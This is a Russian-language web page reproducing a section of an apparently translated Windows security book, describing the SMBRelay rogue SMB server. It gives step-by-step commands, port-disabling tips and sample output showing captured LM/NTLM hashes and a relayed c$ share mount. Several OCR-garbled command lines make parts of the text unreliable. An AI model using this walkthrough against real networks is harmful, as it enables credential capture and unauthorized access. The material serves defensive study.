На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Атаки с применением подложного сервера

В мае 2001 года хакер Sir Dystic из группы Cult of the Dead Cow ("Культ мертвой коровы") написал и выпустил программу под названием SMBRelay, о которой издание The Register объя­вило в заметке под громким заголовком "Exploit Devastates WinNT/2K Security" ("Программа атаки уничтожила защиту WinNT/2K"), ни словом не упомянув о том, что здесь используются недостатки протокола аутентификации LM.
Программа SMBRelay — это фактически SMB-сервер, который может собирать имена пользо­вателей и хешированные пароли, которые передаются при аутентификации SMB. Как следует из названия программы, SMBRelay может действовать не только как подложный сервер SMB, при не­которых условиях ее можно использовать для проведения атак посредника (Man-In-The-Middle Attack, MITM). Возможности программы SMBRelay для проведения атак посредника будут описа­ны в следующем разделе этой главы, а сейчас рассмотрим ее использование в качестве простого подложного сервера SMB.
Установить подложный сервер SMBRelay достаточно легко. Сначала необходимо запус­тить программу SMBRelay с параметром для инвентаризации (/Е), чтобы определить физиче­ский интерфейс, с которого необходимо ожидать подключения.
С:\;-вшЬг*1ву /Е
SMBRelay vO.992 - TCP INetBT) level SMB man-in-the-middle relay attack Copyright 2001:   Sir Dystic,   Cult of  the Dead Cow
Send complaints,   ideas and donations to sirdystic@cultdeadcow.com [2)  ETHERNET CSMACD - 3Com 10/100 Mini PCI Ethernet Adapter [1]   SOFTWARE LOOPBACK - MS TCP Locpoack interface
Как видно из приведенного выше примера, лучше всего подходит интерфейс с индексом 2, так как это физический сетевой адаптер, доступный для удаленных систем (адаптер Loopback доступен только для локального узла localhost). Конечно, можно работать и с нескольки­ми адаптерами, но для примера рассмотрим простейший случай, и в дальнейшем будем ис­пользовать адаптер 2. Заметим, что при разных запусках программы SMBRelay индексы адап­теров могут меняться.
На системах под управлением Windows 2000 или более новых версий, запуск сервера мо­жет оказаться непростой задачей, поскольку эти операционные системы не позволяют посто­ронним процессам устанавливать привязку к ТСР-порту 139, если он используется системой. Чтобы избежать конфликтов, необходимо временно отключить ТСР-порт 139 выбрав пара­метр Disable NetBIOS Over TCP/IP (отключить поддержку NetBIOS через TCP/IP). Чтобы от­крыть окно, в котором находится флажок для активации этого параметра, необходимо от­крыть компонент Local Area Connection (Локальные соединения), затем найдите в списке Internet Protocol (TCP/IP) и щелкните на кнопке Properties (Свойства). В открывшемся диа­логовом окне щелкните на кнопке Advanced (Дополнительные свойства) и откройте вклад­ку WINS, как описано в главе 4, "Инвентаризация". После выполнения этих действий для программы SMBRelay можно выделить ТСР-порт 139.
Если отключить ТСР-порт 139 невозможно, злоумышленник должен создать виртуальный IP-адрес, на котором будет запущен ложный сервер SMB. К счастью, программа SMBRelay умеет автоматически создавать и удалять виртуальные IP-адреса, для этого используется па­раметр командной строки /Ь+1Р_адрес. Но используя этот параметр в Windows 2000, мы получали ошибочные результаты, поэтому вместо использования ключа/Ъ рекомендуем от­ключить ТСР-порт 139, как было описано выше.


Популярность

2

Простота

2

Опасность

7

Степень риска

3

При описании использования утилиты SMBRelay в системах Windows NT SP 6а, необхо­димо упомянуть еще один важный момент: если клиент SMB в одной из новых систем Windows не может подключиться к ТСР-порту 139, он попытается установить соединение SMB через ТСР-порт 445, как было сказано в главе 2, "Архитектура системы безопасности Windows Server 2003". Чтобы эти клиенты не "обходили" ложный SMB-сервер, ожидающий подключения к ТСР-порту 139, ТСР-порт 445 на подложном сервере необходимо заблокиро­вать или отключить. Чтобы после отключения ТСР-порта 445, ТСР-порт 139 продолжал нор­мально функционировать, лучше всего сделать это с помощью фильтра IPSec (см. главу 16, " Возможности и средства защиты В системах Windows").
Следующие примеры иллюстрируют работу сервера SMBRelay, запущенного на узле под управлением Windows 2000. Предполагается, что ТСР-порт 139 был отключен (как это сде­лать, описано выше), а ТСР-порт 445 — заблокирован с помощью фильтра IPSec.
Рассмотрим, как запустить сервер SMBRelay на Windows 2000 при условии, что для ло­кальной связи и ретрансляции будет использоваться интерфейс с индексом 2, а подложный сервер будет ожидать соединений для IP-адреса, соответствующего этому интерфейсу.
С;\>ппЬх*1ау /IL 2 /ГН 2
SMBRelay vO.992 - TCP  INetBT)   level SMB man-in-Che-middle relay attack Copyright 2001:  Sir Dystic,  Cult of the Dead Cow
Send complaints, ideas and donations to sirdystic@cultdeadcow.con\ Using relay adapter index 2: 3Com EtherLink PCI Bound to port 139 on address 192.168.234.34
Следовательно, ггрограмма SMBRelay начнет получать входящие запросы сеансов SMB. Когда атакуемый клиент успешно установит сеанс SMB, ответные действия программы SMBRelay можно представить следующим образом (4).
5.4..Использование прргрйм
Connection from 192.168.234.44:1526 Request type:  Session Request    72 bytes Source name:   CAESARS <00> Target name:   *SMBSERVER <20>
Setting target name to source name and source name to 'CDC4EVER',-. Response: Positive Session Response    4 bytes
Request type: Session Message   137 bytes S MB_COM_JJEGOT I ATE
Response: Session Message   119 bytes
Challenge   (8 bytes): 952B4 997 67C1D123
Request type:  Session Message   298 bytes
SMB_C0M_SESSION_SETUP_ANDX
Password lengths:   24 24
Case insensitive password:     4 05OC79D024AE0F391DF9ABA5BD5F3AE5E8024C5B9489BF6
Case sensitive password: 544FEA21F61D8E854F4C3B4ADF6FA6A5D85F9CEBAB966EEB
Username: "Administrator"
Doma in: ■CAESARS-TS *
OS: "Windows Server 2003 2195-
Lanman type:     ■ Windows Server 2003 5.0"
Response: Session Message   156 bytes
OS: "Windows 5.0°
Lanman type: " Windows Server 2003 LAM Manager"
Domain: "CAESARS-TS"
Password hash written to disk Connected?
Relay IP address added to interface 2
Bound to port 139 on address 192.1.1.1 relaying for host CAESARS 192.168.234.44
Как видите, были захвачены оба пароля для протокола LM (не чувствительный к регистру, "case insensitive") и для протокола NTLM (чувствительный к регистру, "case sensitive"), паро­ли были записаны на диск в файл hashes . txt текущего рабочего каталога. Этот файл можно импортировать в программу LOphtcrack 2.5х для последующего взлома пароля.
НА ЗАМЕТКУ
Поскольку программы SMBRelay и LOphtcrack начиная с версии 2.52 исполь­зуют различный формат файлов, хешированные пароли, перехваченные про­граммой SMBRelay, нельзя напрямую импортировать в LOphtcrack.
Еще хуже, что с системы злоумышленника теперь можно получить доступ к удаленной сис­теме с помощью использования адреса переадресации по умолчанию 192.1.1.1 (5).
Листинг 5.5. Резулеш
JReJay
C:\>net use * W192.1.1. 1\с$
Drive Е:   is now connected to W192 .168 . 234 . 252\cS .
The coranand completed successfully. C:\>dir e:
Volume in drive G has no label.
Volume Serial Number is 44F0-3FDD
Directory of G:\

Documents and Settings Inetpub Program Files WINNT
12/02/2000 10:51p <R> 12/02/2000 10:08p <R> 05/25/2001 03:47a <R> 05/25/2001 03:47a <R> 0 File(s) 0 bytes
4 Dirlsl     44,405,624,832 bytes free
На клиентских системах под управлением Windows 2000, которые непреднамеренно уста­новили соединение с сервером SMBRelay в показанном выше примере, наблюдается следую­щая ситуация. Сначала команда net use дает сбой, вызывая системную ошибку 64 (6). Запуск команды net use показывает отсутствие смонтированных дисков. Но запуск команды net session позволяет выявить соединение с подложным сервером (по имени CDC4EVER, которое программа SMBRelay использует по умолчанию, если оно не было изменено с помощью параметра /S имя при запуске сервера).
Листинг 5.61 сСЩуаций на атакованном клиенте
C:\clientsaet use \\192.168.234.34\ipcS * /и:administrator
Type the password for W192.168.234.34\ipc£: System error 64 has occurred.
The specified network name is no longer available. C:\client>net иве
New connections will not be remembered.

There are no entries in the list. C:\client>net session
Computer User name Client Type opens Idle time
WCDC4EVER ADMINISTRATOR        Owned by cDc
The command completed successfully.
0 00:00:27
При использовании сервера SMBRelay часто возникают некоторые проблемы, которые показаны в следующем примере. Пусть IP-адрес атакуемого компьютера 192 .168.234.223.
Connection from 192.168.234.223:2173
Error receiving data from incoming connection
Обычно это происходит, если атакуемый компьютер передает неверную комбинацию "имя пользователя/пароль". Утилита SMBRelay будет продолжать прослушивать порт, но могут возникать и другие ошибки.
Connection rejected:  192.168.234.223 already connected
После неудавшейся попытки подключения с определенного IP-адреса атакуемого компь­ютера, эту ошибку будут вызывать все последующие попытки подключения с данного адреса (в файле readme сказано, что такое поведение обусловлено структурой программы). С этой же проблемой можно столкнуться даже после успешного подключения, тогда выдается сооб­щение "Login failure code: OxC000006DB. С описанными недостатками программы можно бороться перезапустив сервер SMBRelay (для его остановки нужно нажать комбина­цию клавиш <Ctrl+C>). Кроме того, могут выдаваться примерно следующие сообщения.
Connection from 169.254.9.119:2174 Unable to connect to 169.254.9.119:139
Это адаптер Loopback (петли обратной связи) пытается соединиться с сервером SMBRelay — сообщения можно просто игнорировать.
Помните, что можно также использовать перенаправление протокола ARP И подмену со­держимого кэш-памяти, чтобы клиентские данные перенаправлялись на подложный сервер SMB, см. Секреты хакеров. Безопасность сетей — готовые решения, четвертое издание, глава 9.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика